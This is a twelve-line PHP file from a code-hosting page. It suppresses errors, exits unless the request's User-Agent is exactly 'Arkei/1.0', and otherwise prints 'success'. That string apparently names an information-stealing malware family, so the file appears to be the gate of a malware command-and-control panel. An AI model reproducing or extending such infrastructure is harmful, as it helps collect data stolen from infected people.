Files

12 lines
120 B
PHP
Raw Permalink Normal View History

2026-08-27 10:51:19 -06:00
<?php
error_reporting(0);
if($_SERVER["HTTP_USER_AGENT"] != "Arkei/1.0")
{
exit(0);
}
echo "success";
?>